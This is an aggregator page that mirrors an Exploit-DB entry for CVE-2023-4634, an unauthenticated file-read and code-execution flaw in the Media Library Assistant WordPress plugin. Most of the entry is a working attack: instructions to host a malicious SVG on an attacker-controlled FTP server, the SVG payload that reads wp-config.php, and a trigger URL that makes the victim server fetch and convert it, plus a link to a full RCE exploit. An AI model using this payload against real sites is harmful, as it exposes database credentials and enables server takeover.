4

[webapps] Media Library Assistant Wordpress Plugin - RCE and LFI

 9 months ago
source link: https://www.exploit-db.com/exploits/51737
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

Media Library Assistant Wordpress Plugin - RCE and LFI

EDB-ID:

51737

EDB Verified:

Exploit:

  /  

Platform:

PHP

Date:

2023-10-09

Vulnerable App:

# Exploit Title: Media Library Assistant Wordpress Plugin - RCE and LFI 
# Date: 2023/09/05
# CVE: CVE-2023-4634
# Exploit Author: Florent MONTEL / Patrowl.io / @Pepitoh / Twitter @Pepito_oh
# Exploitation path: https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/
# Exploit: https://github.com/Patrowl/CVE-2023-4634/
# Vendor Homepage: https://fr.wordpress.org/plugins/media-library-assistant/
# Software Link: https://fr.wordpress.org/plugins/media-library-assistant/
# Version: < 3.10
# Tested on: 3.09
# Description:
# Media Library Assistant Wordpress Plugin in version < 3.10 is affected by an unauthenticated remote reference to Imagick() conversion which allows attacker to perform LFI and RCE depending on the Imagick configuration on the remote server. The affected page is: wp-content/plugins/media-library-assistant/includes/mla-stream-image.php


#LFI

Steps to trigger conversion of a remote SVG

Create a remote FTP server at ftp://X.X.X.X:21 (http will not work, see references)

Host 2 files :
- malicious.svg
- malicious.svg[1]


Payload:
For LFI, getting wp-config.php:

Both malicious.svg and malicious.svg[1] on the remote FTP:

<svg width="500" height="500"
xmlns:xlink="http://www.w3.org/1999/xlink">
xmlns="http://www.w3.org/2000/svg">
<image xlink:href= "text:../../../../wp-config.php" width="500" height="500" />
</svg>

Then trigger conversion with:
http://127.0.0.1/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://X.X.X.X:21/malicious.svg&mla_debug=log&mla_stream_frame=1


# Directory listing or RCE:
To achieve Directory listing or even RCE, it is a little more complicated. 

Use exploit available here:
https://github.com/Patrowl/CVE-2023-4634/

# Note
Exploitation will depend on the policy.xml Imagick configuration file installed on the remote server. All exploitation paths and scripts have been performed with a default wordpress configuration and installation (Wordpress has high chance to have the default Imagick configuration).

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK